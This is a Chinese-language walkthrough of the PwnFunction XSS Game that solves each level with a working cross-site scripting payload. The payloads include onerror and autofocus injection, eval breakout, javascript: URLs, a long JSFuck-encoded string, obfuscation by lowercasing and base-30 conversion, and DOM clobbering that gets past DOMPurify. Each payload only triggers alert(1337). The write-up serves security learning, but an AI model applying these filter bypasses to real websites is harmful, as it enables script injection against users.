目录
[Ma Spaghet!](#Ma Spaghet!)
[Ugandan Knuckles](#Ugandan Knuckles)
[Ricardo Milos](#Ricardo Milos)
[Ah That's Hawt](#Ah That's Hawt)
[Ok, Boomer(DOM破坏)](#Ok, Boomer(DOM破坏))
网址:XSS Game - Learning XSS Made Simple! | Created by PwnFunction
Ma Spaghet!
来分析一下代码
就是一个URL类里进行一个get接收参数(somebody)如果没参数就默认接收(Somebody)这个参数,然后把它放进innerHTML里面去,然后再调用进h2标签中。
因为我看见了innerHTML,它禁用了一个方法也就是<script>标签,但也只限制了它一个标签,我们可以用<img>标签去编写
?somebody=<img%20src=1%20onerror="alert(1337)">
Jefff
先get传参,传入一个jeff如果没有传参就默然传参JEFFF
然后设置一个空值ma,然后再命令执行`ma="Ma name ${jeff}"`,最后设置一个定时器,ma将值赋值给h2标签
这道题跟上一道不一样,上一道用的是innerHTML安全系数明显比较低,因为它不能将标签也解析出来输出到页面中去,而这一道题innerText可以将标签也解析出来
?jeff=aaa";alert(1337);"这个思路我们可以带进源代码看看无非就是这样
Eval(ma="Ma name ${jeff}")
Eval(`ma="Ma name aaa";alert(1337);""`)
或者这样使用-,这是连接符
?jeff="-alert(1337)-"
Ugandan Knuckles
无非就是过滤掉我的<>这个符号
Input里面有一个用户传递的值,只需将双引号闭合就是写上<script>,但是<>被过滤了。所以现在能使用点击事件onclick函数,或者onfocus函数,自动就加个autofocus函数
?wey=aaa"%20onfocus=alert(1337)%20autofocus="
Ricardo Milos
先分析一下代码,我发现了submmit这个提交事件,然后这个是在定时器里的,它获取了from表单的id,然后在两秒钟里面进行action的自动提交,而这个action正是from表单action属性。
然后action属性里面的内容可以直接写Js的语句,例如:
有了以上的例子,我们发现这个自动提交不会有这个麻烦,而且我们直接写在传参里面就可以了这个js语句
注意:它里面有个默认action提交到本地也就是那个#,两秒会自动出现,那么后面输入以下参数记得把提交到本地那个?milos=True#删掉再写下面这段代码
?ricardo=JavaScript:alert(1337)
Ah That's Hawt
分析一下代码,它过滤掉了( 、) 、` 和 \ 然后再使用innerHTML将它放到h2标签中去了。
因为使用到了innerHTML我就想到了第一关那种解法
?somebody=<img%20src=1%20οnerrοr="alert(1337)">
我发现它居然过滤掉了()那么函数就使用不了了
于是我就想到了用URLcode去转意一哈
先使用%28%29,发现结果与之前相同
于是我就想到了用URLcode去转意一哈,也就是先将%转换成%25然后(转换成%28)%29
发现不知道为什么%28%29没有转意
我就想到先用loction将它先变成字符串然后再执行,但是前面必须先要写上协议,才能执行后面的参数
?markassbrownlee=<img%20src=1%20onerror=location="JavaScript:alert%25281337%2529">
Ligma
我发现它字母数字不能使用了,只能使用编码的方式去绕过了
然后这里需要我们去一个网站:JSFuck - Write any JavaScript with 6 Characters: []()!+
我们直接拿过来是不行的,必须先要通过URLcoden编码才行
然后?balls=拿到的那一长串urlcode的编码
?balls=%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%2B%5B!%5B%5D%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%2B(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D))%5B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B((%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%5D(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)()((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%5B%2B%5B%5D%5D%2B!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)
Mafia
过滤的东西明显就比较多,有` 、' 、 " 、+ 、\ 、[]
然后还限制长度50个字符
还过滤了特殊字符alter
突然感觉换个函数就可以了confirm(1337)
?mafia=confirm(1337)
感觉明显没什么意义
我寻思着如果那三个函数全过滤掉了,那么我该如何去解决呢?
我想起了function构造匿名函数,如果我使用Function()()也就是说去直接执行function()这个函数这个括号里面可以写我要去执行的内容
然后我就写了Function(/alert(1337)/)()
但是我又发现它过滤了alert,但是我想起可以使用大写啊可以绕过去
我又改为了Function(/ALERT(1337)/)()
我学xss的时候翻阅了资料知道了JS严格区分大小写还有就是JS不能编码符号
但是我们可以定义函数的,于是我去查阅了相关的官方手册,看看有没有什么能转小写的函数方法
于是我查到了toLowerCase()
现在改为了Function(/ALERT(1337)/.source.toLowerCase())()
// 匿名函数
?mafia=Function(/ALERT(1337)/.source.toLowerCase())()
同时也可以使用数字转字符串,将30进制的数字8680439转换成字符串,就是alert
eval(8680439..toString(30))(1337)
在URL后面加上 #alert(1337)
eval(location.hash.slice(1))
Ok, Boomer(DOM破坏)
我们发现居然存在DOMPurify.sanitize居然存在过滤框架,基本上绕不过,但是我们可以在
网上查一下这个框架的源码,发现之前写的危险函数和代码都用不到
只能往下考虑了,然后我发现哈这个ok这个参数好像没有,我等了两秒发现没有ok的弹出
先进入页面看一下
确定了ok确实没有这个参数,我们能不能构造一个ok呢?
在⽆法直接 XSS的情况下,我们就可以往 DOM Clobbering 这⽅向考虑了。 然后我发现可以使用Dom Clobbering
什么是Dom Clobbering?
例如:
我们发现居然取一个id它居然直接把整个标签都取出来了,这就是弱类型语言嘛
当然这个只是一部分,还有就是:
这个步骤是
先取出cookie,发现没有东西
首先创建一个元素是div
然后再给div赋值
然后再给这个div插入到boby中去
然后再去取出cookie,然后发现将div里面的包含cookie的值取出来了,弱类型语言取值本来取标签名,结果把整个标签取了出来
可以写一个html代码到网页上面去看看
无非就是将body下面的appendChild里面的元素转换成了字符串
然后再分析
Object.getOwnPropertyNames(window) //获取到了window下所以的属性名字
.filter(p=>p.match(/Element$/)) //过滤以获取后缀带element的
.map(p=>window[p]) //然后我把这个属性名称里面的值取出来
.filter(p=>p &&p.prototype &&p.prototype.toString
!== Object.prototype.toString)//然后这个p必须有prototype这个属性而且它这个属性上面还必须有tostring这个方法,并且不能是继承object这个上面的方法,必须是自身的
取出来两个值
我们明显发现这个第二个值就是a标签,我们都可以利⽤href 属性来进⾏字符串转换
我们去查相关文档发现
发现这个定时器可以把函数当成字符串然后去执行
那就好办了,a标签的href可以替换成字符串,然后定时器去执行,但是我们还得绕过那个框架
?boomer=<a%20id=ok%20href=mailto:alert(1337)>
?boomer=<a%20id=ok%20href=tel:alert(1337)>boomer通过赋值,这个ok就先进带h2标签里面去了。然后就通过下面那个定时器通过id=ok把我传进去的a标签获取到了,但是由于获取到以后定时器就会在两秒后调用tostring方法,所以自己调用href里面的属性整个就会被当做字符串去执行了
